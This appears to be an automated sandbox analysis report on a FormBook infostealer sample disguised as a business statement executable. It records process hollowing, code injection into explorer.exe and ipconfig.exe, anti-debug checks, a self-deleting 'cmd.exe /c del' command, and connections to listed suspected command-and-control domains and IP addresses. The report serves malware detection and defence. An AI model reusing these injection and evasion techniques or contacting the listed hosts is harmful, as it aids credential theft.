Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC3884 mov eax, dword ptr fs:[00000030h]	8_2_02DC3884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC3884 mov eax, dword ptr fs:[00000030h]	8_2_02DC3884
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7F0BF mov ecx, dword ptr fs:[00000030h]	8_2_02D7F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7F0BF mov eax, dword ptr fs:[00000030h]	8_2_02D7F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7F0BF mov eax, dword ptr fs:[00000030h]	8_2_02D7F0BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D890AF mov eax, dword ptr fs:[00000030h]	8_2_02D890AF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D720A0 mov eax, dword ptr fs:[00000030h]	8_2_02D720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D720A0 mov eax, dword ptr fs:[00000030h]	8_2_02D720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D720A0 mov eax, dword ptr fs:[00000030h]	8_2_02D720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D720A0 mov eax, dword ptr fs:[00000030h]	8_2_02D720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D720A0 mov eax, dword ptr fs:[00000030h]	8_2_02D720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D720A0 mov eax, dword ptr fs:[00000030h]	8_2_02D720A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D60050 mov eax, dword ptr fs:[00000030h]	8_2_02D60050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D60050 mov eax, dword ptr fs:[00000030h]	8_2_02D60050
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E02073 mov eax, dword ptr fs:[00000030h]	8_2_02E02073
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E11074 mov eax, dword ptr fs:[00000030h]	8_2_02E11074
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC7016 mov eax, dword ptr fs:[00000030h]	8_2_02DC7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC7016 mov eax, dword ptr fs:[00000030h]	8_2_02DC7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC7016 mov eax, dword ptr fs:[00000030h]	8_2_02DC7016
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6A830 mov eax, dword ptr fs:[00000030h]	8_2_02D6A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6A830 mov eax, dword ptr fs:[00000030h]	8_2_02D6A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6A830 mov eax, dword ptr fs:[00000030h]	8_2_02D6A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6A830 mov eax, dword ptr fs:[00000030h]	8_2_02D6A830
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E14015 mov eax, dword ptr fs:[00000030h]	8_2_02E14015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E14015 mov eax, dword ptr fs:[00000030h]	8_2_02E14015
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7002D mov eax, dword ptr fs:[00000030h]	8_2_02D7002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7002D mov eax, dword ptr fs:[00000030h]	8_2_02D7002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7002D mov eax, dword ptr fs:[00000030h]	8_2_02D7002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7002D mov eax, dword ptr fs:[00000030h]	8_2_02D7002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7002D mov eax, dword ptr fs:[00000030h]	8_2_02D7002D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5B02A mov eax, dword ptr fs:[00000030h]	8_2_02D5B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5B02A mov eax, dword ptr fs:[00000030h]	8_2_02D5B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5B02A mov eax, dword ptr fs:[00000030h]	8_2_02D5B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5B02A mov eax, dword ptr fs:[00000030h]	8_2_02D5B02A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DD41E8 mov eax, dword ptr fs:[00000030h]	8_2_02DD41E8
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]	8_2_02D4B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]	8_2_02D4B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4B1E1 mov eax, dword ptr fs:[00000030h]	8_2_02D4B1E1
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E049A4 mov eax, dword ptr fs:[00000030h]	8_2_02E049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E049A4 mov eax, dword ptr fs:[00000030h]	8_2_02E049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E049A4 mov eax, dword ptr fs:[00000030h]	8_2_02E049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E049A4 mov eax, dword ptr fs:[00000030h]	8_2_02E049A4
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D72990 mov eax, dword ptr fs:[00000030h]	8_2_02D72990
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7A185 mov eax, dword ptr fs:[00000030h]	8_2_02D7A185
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6C182 mov eax, dword ptr fs:[00000030h]	8_2_02D6C182
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC51BE mov eax, dword ptr fs:[00000030h]	8_2_02DC51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC51BE mov eax, dword ptr fs:[00000030h]	8_2_02DC51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC51BE mov eax, dword ptr fs:[00000030h]	8_2_02DC51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC51BE mov eax, dword ptr fs:[00000030h]	8_2_02DC51BE
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov eax, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov eax, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov eax, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov ecx, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D699BF mov eax, dword ptr fs:[00000030h]	8_2_02D699BF
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D761A0 mov eax, dword ptr fs:[00000030h]	8_2_02D761A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D761A0 mov eax, dword ptr fs:[00000030h]	8_2_02D761A0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC69A6 mov eax, dword ptr fs:[00000030h]	8_2_02DC69A6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6B944 mov eax, dword ptr fs:[00000030h]	8_2_02D6B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6B944 mov eax, dword ptr fs:[00000030h]	8_2_02D6B944
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4B171 mov eax, dword ptr fs:[00000030h]	8_2_02D4B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4B171 mov eax, dword ptr fs:[00000030h]	8_2_02D4B171
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4C962 mov eax, dword ptr fs:[00000030h]	8_2_02D4C962
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D49100 mov eax, dword ptr fs:[00000030h]	8_2_02D49100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D49100 mov eax, dword ptr fs:[00000030h]	8_2_02D49100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D49100 mov eax, dword ptr fs:[00000030h]	8_2_02D49100
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7513A mov eax, dword ptr fs:[00000030h]	8_2_02D7513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7513A mov eax, dword ptr fs:[00000030h]	8_2_02D7513A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D64120 mov eax, dword ptr fs:[00000030h]	8_2_02D64120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D64120 mov eax, dword ptr fs:[00000030h]	8_2_02D64120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D64120 mov eax, dword ptr fs:[00000030h]	8_2_02D64120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D64120 mov eax, dword ptr fs:[00000030h]	8_2_02D64120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D64120 mov ecx, dword ptr fs:[00000030h]	8_2_02D64120
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D736CC mov eax, dword ptr fs:[00000030h]	8_2_02D736CC
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DFFEC0 mov eax, dword ptr fs:[00000030h]	8_2_02DFFEC0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D88EC7 mov eax, dword ptr fs:[00000030h]	8_2_02D88EC7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E18ED6 mov eax, dword ptr fs:[00000030h]	8_2_02E18ED6
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D716E0 mov ecx, dword ptr fs:[00000030h]	8_2_02D716E0
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D576E2 mov eax, dword ptr fs:[00000030h]	8_2_02D576E2
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E10EA5 mov eax, dword ptr fs:[00000030h]	8_2_02E10EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E10EA5 mov eax, dword ptr fs:[00000030h]	8_2_02E10EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E10EA5 mov eax, dword ptr fs:[00000030h]	8_2_02E10EA5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DDFE87 mov eax, dword ptr fs:[00000030h]	8_2_02DDFE87
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC46A7 mov eax, dword ptr fs:[00000030h]	8_2_02DC46A7
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D57E41 mov eax, dword ptr fs:[00000030h]	8_2_02D57E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D57E41 mov eax, dword ptr fs:[00000030h]	8_2_02D57E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D57E41 mov eax, dword ptr fs:[00000030h]	8_2_02D57E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D57E41 mov eax, dword ptr fs:[00000030h]	8_2_02D57E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D57E41 mov eax, dword ptr fs:[00000030h]	8_2_02D57E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D57E41 mov eax, dword ptr fs:[00000030h]	8_2_02D57E41
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E0AE44 mov eax, dword ptr fs:[00000030h]	8_2_02E0AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E0AE44 mov eax, dword ptr fs:[00000030h]	8_2_02E0AE44
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6AE73 mov eax, dword ptr fs:[00000030h]	8_2_02D6AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6AE73 mov eax, dword ptr fs:[00000030h]	8_2_02D6AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6AE73 mov eax, dword ptr fs:[00000030h]	8_2_02D6AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6AE73 mov eax, dword ptr fs:[00000030h]	8_2_02D6AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6AE73 mov eax, dword ptr fs:[00000030h]	8_2_02D6AE73
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5766D mov eax, dword ptr fs:[00000030h]	8_2_02D5766D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7A61C mov eax, dword ptr fs:[00000030h]	8_2_02D7A61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7A61C mov eax, dword ptr fs:[00000030h]	8_2_02D7A61C
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4C600 mov eax, dword ptr fs:[00000030h]	8_2_02D4C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4C600 mov eax, dword ptr fs:[00000030h]	8_2_02D4C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4C600 mov eax, dword ptr fs:[00000030h]	8_2_02D4C600
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D78E00 mov eax, dword ptr fs:[00000030h]	8_2_02D78E00
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DFFE3F mov eax, dword ptr fs:[00000030h]	8_2_02DFFE3F
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E01608 mov eax, dword ptr fs:[00000030h]	8_2_02E01608
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D4E620 mov eax, dword ptr fs:[00000030h]	8_2_02D4E620
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D837F5 mov eax, dword ptr fs:[00000030h]	8_2_02D837F5
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D58794 mov eax, dword ptr fs:[00000030h]	8_2_02D58794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC7794 mov eax, dword ptr fs:[00000030h]	8_2_02DC7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC7794 mov eax, dword ptr fs:[00000030h]	8_2_02DC7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DC7794 mov eax, dword ptr fs:[00000030h]	8_2_02DC7794
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E18F6A mov eax, dword ptr fs:[00000030h]	8_2_02E18F6A
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5EF40 mov eax, dword ptr fs:[00000030h]	8_2_02D5EF40
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D5FF60 mov eax, dword ptr fs:[00000030h]	8_2_02D5FF60
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6F716 mov eax, dword ptr fs:[00000030h]	8_2_02D6F716
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DDFF10 mov eax, dword ptr fs:[00000030h]	8_2_02DDFF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02DDFF10 mov eax, dword ptr fs:[00000030h]	8_2_02DDFF10
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7A70E mov eax, dword ptr fs:[00000030h]	8_2_02D7A70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7A70E mov eax, dword ptr fs:[00000030h]	8_2_02D7A70E
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D7E730 mov eax, dword ptr fs:[00000030h]	8_2_02D7E730
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6B73D mov eax, dword ptr fs:[00000030h]	8_2_02D6B73D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02D6B73D mov eax, dword ptr fs:[00000030h]	8_2_02D6B73D
Source: C:\Windows\SysWOW64\ipconfig.exe	Code function: 8_2_02E1070D mov eax, dword ptr fs:[00000030h]	8_2_02E1070D

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 3_2_00409B50 LdrLoadDll,

3_2_00409B50

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Domain query: www.estateglobal.info
Source: C:\Windows\explorer.exe	Network Connect: 212.1.210.76 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 160.153.136.3 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 15.197.142.173 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 104.21.86.185 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.com-weekly.email
Source: C:\Windows\explorer.exe	Domain query: www.mmfirewood.net
Source: C:\Windows\explorer.exe	Network Connect: 52.6.230.169 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.akshayaasri.com
Source: C:\Windows\explorer.exe	Domain query: www.fjallravenz.online
Source: C:\Windows\explorer.exe	Domain query: www.morethanmummies.com
Source: C:\Windows\explorer.exe	Domain query: www.simonhaidomous.com
Source: C:\Windows\explorer.exe	Network Connect: 154.212.212.21 80	Jump to behavior
Source: C:\Windows\explorer.exe	Domain query: www.spacebymeghan.com

Sample uses process hollowing technique

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Section unmapped: C:\Windows\SysWOW64\ipconfig.exe base address: 280000

Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Section loaded: unknown target: C:\Windows\SysWOW64\ipconfig.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: read write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Section loaded: unknown target: unknown protection: read write	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Memory written: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe base: 400000 value starts with: 4D5A

Jump to behavior

Queues an APC in another process (thread injection)

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Modifies the context of a thread in another process (thread injection)

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Thread register set: target process: 3424			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Thread register set: target process: 3424			Jump to behavior

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe	Process created: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"			Jump to behavior
Source: C:\Windows\SysWOW64\ipconfig.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe"			Jump to behavior

Source: explorer.exe, 00000005.00000000.686978439.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.704670462.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.672786767.0000000000AD8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ProgmanMD6
Source: explorer.exe, 00000005.00000000.687166646.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.704979510.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.672951369.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 00000005.00000000.687166646.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.675851677.0000000005E50000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.704979510.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.672951369.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.687166646.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.704979510.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.672951369.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.687166646.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.704979510.0000000001080000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.672951369.0000000001080000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.712331473.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.698134921.000000000A716000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.679317249.000000000A716000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd5D

Source: C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe

Code function: 1_2_00405AA7 GetVersion,GetSystemDirectoryA,GetWindowsDirectoryA,SHGetSpecialFolderLocation,SHGetPathFromIDListA,CoTaskMemFree,lstrcatA,lstrlenA,

1_2_00405AA7

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.HIRE SOA FOR DEC_2021.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.0.HIRE SOA FOR DEC_2021.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.HIRE SOA FOR DEC_2021.exe.1ac80000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.923922972.0000000002860000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.678729198.000000001AC80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.666927369.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727381922.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.667732037.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727546752.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923725449.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.923819595.0000000002640000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.727459456.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.708836625.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.692391480.0000000006C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	11 Native API	Path Interception	612 Process Injection	2 Virtualization/Sandbox Evasion	OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
